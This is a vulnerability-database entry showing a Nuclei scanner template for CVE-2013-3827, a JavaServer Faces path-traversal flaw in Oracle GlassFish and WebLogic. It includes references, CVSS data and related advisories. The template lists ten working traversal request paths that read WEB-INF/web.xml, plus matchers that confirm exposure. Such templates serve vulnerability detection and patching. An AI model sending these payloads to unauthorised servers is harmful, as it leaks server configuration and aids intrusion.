Lucene search
ProjectDiscoveryNUCLEI:CVE-2013-3827HistoryJun 30, 2021 - 10:50 a.m.
Javafaces LFI
2021-06-3010:50:41
ProjectDiscovery
github.com
69
An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
id: CVE-2013-3827
info:
name: Javafaces LFI
author: Random-Robbie
severity: medium
description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
remediation: |
Apply the latest patches and updates for the affected software to fix the LFI vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802
- https://www.oracle.com/security-alerts/cpuoct2013.html
- http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
- http://rhn.redhat.com/errata/RHSA-2014-0029.html
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2013-3827
cwe-id: NVD-CWE-noinfo
epss-score: 0.64598
epss-percentile: 0.97602
cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:*
metadata:
max-request: 10
vendor: oracle
product: fusion_middleware
tags: cve,cve2013,edb,lfi,javafaces,oracle
http:
- method: GET
path:
- "{{BaseURL}}{{paths}}"
payloads:
paths:
- "/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<web-app"
- "</web-app>"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100d411c9cac78be8c4ab9a5bdfbc6d4114b99d7b7056c9bb27e3e32ac184482bea022100f177f6296d1afe8ddedb37e3d67eb07efe63553fae17ea089d4a75ca504e2f5e:922c64590222798bb761d5b6d8e72950Related
veracode
veracode
Directory Traversal
2017-03-28 04:33:28
prion
prion
Buffer overflow
2013-10-16 15:55:00
hackerone
hackerone
cvelist
cvelist
CVE-2013-3827
2013-10-16 15:00:00
cve
cve
CVE-2013-3827
2013-10-16 15:55:00
debiancve
debiancve
CVE-2013-3827
2013-10-16 15:55:00
osv
osv
Path Traversal in Eclipse Mojarra
2022-05-17 03:13:10
nessus
nessus
Oracle JavaServer Faces Multiple Partial Directory Traversals
2013-11-19 00:00:00
Oracle GlassFish Server Multiple Vulnerabilities (October 2013 CPU)
2013-10-17 00:00:00
github
github
Path Traversal in Eclipse Mojarra
2022-05-17 03:13:10
cert
cert
Oracle JavaServer Faces contains multiple vulnerabilities
2013-10-18 00:00:00
redhat
redhat
(RHSA-2014:0029) Important: Red Hat JBoss Data Grid 6.2.0 update
2014-01-15 17:38:16
securityvulns
securityvulns
oracle
oracle
Oracle Critical Patch Update - October 2013
2013-10-15 00:00:00